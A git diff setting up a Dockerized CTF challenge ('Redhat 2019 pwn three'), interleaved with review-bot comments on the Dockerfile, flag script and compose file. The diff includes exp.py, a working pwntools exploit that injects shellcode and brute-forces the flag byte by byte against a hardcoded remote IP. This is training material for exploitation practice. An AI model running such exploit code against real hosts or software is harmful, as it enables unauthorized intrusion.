diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..2ed3f9d
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,8 @@
+FROM ctftraining/base_pwn_xinetd
+
+COPY _files/flag.sh /flag.sh
+COPY src/pwn /home/ctf/pwn
+
+RUN chown root:ctf /home/ctf/pwn && \
+ chmod 750 /home/ctf/pwn && \
+ apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
\ No newline at end of file
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..d295657
--- /dev/null
+++ b/README.md
@@ -0,0 +1,22 @@
+# 2019红帽杯 pwn three
+
+## 题目详情
+
+- **Redhat_2019_pwn_three**
+- **shellcode**
+
+## 考点
+
+- shellcode
+- 爆破
+
+## 启动
+
+```
+docker-compose up -d
+nc 127.0.0.1 10001
+```
+
+## 版权
+
+该题目复现环境尚未取得主办方及出题人相关授权,如果侵权,请联系本人删除( alkaid.ginkgo@gmail.com)
\ No newline at end of file
diff --git a/_files/flag.sh b/_files/flag.sh
new file mode 100644
index 0000000..7c9f327
--- /dev/null
+++ b/_files/flag.sh
@@ -0,0 +1,10 @@
+#!/bin/bash
+
+echo $FLAG > /home/ctf/flag
+
+chmod 444 /home/ctf/flag
+
+export FLAG=not_flag
+FLAG=not_flag
+
+rm -f /flag.sh
\ No newline at end of file
diff --git a/docker-compose.yml b/docker-compose.yml
new file mode 100644
index 0000000..0fcc9c6
--- /dev/null
+++ b/docker-compose.yml
@@ -0,0 +1,15 @@
+version: "2"
+services:
+
+ pwn:
+ build:
+ context: .
+ dockerfile: Dockerfile
+ image: ctftraining/suctf_2019_pwn_oldpc
+ volumes:
+ - ./tcpdump:/var/lib/tcpdump
+ ports:
+ - "10001:10000"
+ environment:
+ - FLAG=ctftraining{welcome_to_ctftraining}
+ - TCPDUMP_ENABLE=0
diff --git a/exp.py b/exp.py
new file mode 100644
index 0000000..29d7f44
--- /dev/null
+++ b/exp.py
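Review bot: `FROM ctftraining/base_pwn_xinetd` on the first line of the Dockerfile hunk is untagged, so every build silently resolves to whatever `:latest` is at that moment and the challenge environment is not reproducible; pin a tag and, for a published training image, a digest, e.g. `FROM ctftraining/base_pwn_xinetd:<TAG>@sha256:<DIGEST>` (placeholders). The `apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*` tail of the `RUN` is a no-op: no `apt-get` runs in this Dockerfile, and deleting files that live in a base-image layer from a later layer does not shrink the image, so the `RUN` can be reduced to the `chown`/`chmod` pair. Whether the base image actually executes the copied `/flag.sh` at startup is not visible here and should be confirmed against that image's entrypoint.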
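Review bot: `echo $FLAG > /home/ctf/flag` in the flag.sh hunk leaves `$FLAG` unquoted, so a flag containing spaces or glob characters is word-split and glob-expanded before it is written, and an unset `FLAG` silently produces an empty flag file; use `printf '%s\n' "${FLAG:?FLAG is not set}" > /home/ctf/flag` so the script fails loudly instead. The `export FLAG=not_flag` / `FLAG=not_flag` pair only rewrites this script's own environment; whether the xinetd-spawned service still inherits the real value depends on how the base image's entrypoint invokes `/flag.sh`, which is not visible here, so the scrubbing should be verified (e.g. by inspecting the service process environment) rather than assumed. The bare `FLAG=not_flag` after the `export` line is redundant and can be dropped.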
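Review bot: The `image:` value `ctftraining/suctf_2019_pwn_oldpc` in the docker-compose.yml hunk does not match this challenge — the README names it `Redhat_2019_pwn_three` — which looks like a copy-paste from another challenge's compose file and would tag this build under another challenge's image name; rename it, e.g. `image: ctftraining/redhat_2019_pwn_three` (constructed). `version: "2"` is the legacy compose schema key and is ignored by current Compose; it can be removed or bumped. The indentation under `services:` is collapsed in this rendering and cannot be checked from here; confirm `pwn:` and its keys nest with consistent two-space indents.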
@@ -0,0 +1,30 @@
+from pwn import *
+#p=process("./pwn")
+
+def create(index,content):
+ p=remote("47.104.190.38", 12001)
+ p.sendlineafter("Give me a index:\n",str(index))
+ shellcode = asm("mov eax,dword ptr[ecx];ret")
+ p.sendafter("Three is good number,I like it very much!\n",shellcode)
+ p.sendlineafter('Leave you name of size:\n','2')
+ p.sendafter("Tell me:\n",p8(content))
+ tmp= p.recvuntil('\n')
+ p.close()
+ if '1' in tmp:
+ print 'yes'
+ return True
+ else:
+ return False
+
+idx=0
+flag=''
+while "}" not in flag:
+ for i in range(256):
+ b=create(idx,i)
+ if b:
+ idx+=1
+ flag+=chr(i)
+ print flag
+ break;
+print flag
+p.interactive()
\ No newline at end of file
diff --git a/src/pwn b/src/pwn
new file mode 100644
index 0000000..9c8edb0
Binary files /dev/null and b/src/pwn differ
diff --git a/tcpdump/.gitkeep b/tcpdump/.gitkeep
new file mode 100644
index 0000000..e69de29
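Review bot: The final `p.interactive()` raises `NameError` at module level: `p` is only bound inside `create()` (and closed there before it returns), and the module-level `p=process("./pwn")` is commented out, so the line is dead and should be removed. The script is Python 2 only (`print flag`, `'1' in tmp` on a raw socket response), which the README does not state; a one-line comment such as `# requires Python 2 / pwntools 3.x` at the top would save the next reader a confusing failure. The stray `;` on `break;` is harmless but unidiomatic.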